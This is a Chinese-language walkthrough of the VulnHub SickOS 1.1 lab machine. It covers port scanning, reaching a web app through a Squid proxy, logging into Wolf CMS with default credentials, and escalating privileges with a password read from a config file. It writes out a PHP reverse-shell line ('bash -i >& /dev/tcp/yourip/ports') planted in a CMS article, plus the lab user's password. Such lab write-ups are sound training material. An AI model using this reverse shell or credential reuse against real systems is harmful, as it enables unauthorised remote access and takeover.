靶机下载链接:https://download.vulnhub.com/sickos/sick0s1.1.7z
复现视频:【「红队笔记」靶机精讲:SickOS1.1 - 穿越Squid代理的CMS渗透】https://www.bilibili.com/video/BV1Em4y1A7XX?vd_source=09d322662ec63869ded6328cd2203029
解法一
靶机安装成功页面,靶机网络要设置成net模式。
信息收集
主机发现,可以用ip a看一下自己主机的ip地址,这样能方便的找到靶机ip
扫描端口
扫描端口对应的服务版本和操作系统,3128端口是个http的代理,8080端口被关闭了,但是后面也有个代理的关键词,可以尝试将3128端口设置为代理去访问8080端口。
利用kali自带的脚本去扫描漏洞
web渗透
访问3128端口,8080端口被关闭。
在百度之后发现squid3.1.19是作为代理服务器用的。
设置浏览器的代理,ip和对应端口
设置代理ip,port。
这时候再去访问8080端口,就可以访问成功了。
接下来就是常规的web渗透,扫描目录
由于80端口没有开放,8080端口也需要代理才能访问,所以扫描的脚本就没有运行起来。
设置dirb,利用代理端口3128去扫描靶机ip。这样就得到结果了,访问目录。
得到的信息是
“我尝试非常频繁地连接事物”
“您可能想试试我的服务”
http://192.168.33.138/index;http://192.168.33.138/index.php;
得到的信息,是一个语气词。
http://192.168.33.138/robots;http://192.168.33.138/robots.txt;
得到一个目录
尝试去访问这个目录,进入一个cms。
利用必应去搜索wolfcms的后台路径,没想到直接就搜到了。
查看后台页面
登陆思路:尝试弱口令爆破;网上搜索cms的默认用户和密码;渗透去寻找其他的有用信息;
由于在网上已经找到了默认用户和密码,我们去尝试登陆一下。
成功登陆网站后台
在Articles文件中写入反弹shell命令
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/yourip/ports 0>&1'"); ?>
保存后,及时开启nc监听端口。
点击放大镜运行代码
收到一个shell
查看当前用户是谁,权限是多少。查看用户文件,谁拥有完整shell
但是是没权限看密码文件
提权
查看当前目录有哪些文件,发现一个配置文件
查看配置文件内容,发现一个用户名和密码
我们尝试用这一对用户名和密码去远程登陆
直接登陆root失败了
在前面还有一个用户“sickos”具有完整shell权限,尝试利用密码“john@123”登陆,成功了
查看当前用户,以及权限,提权成功。
成功拿到flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
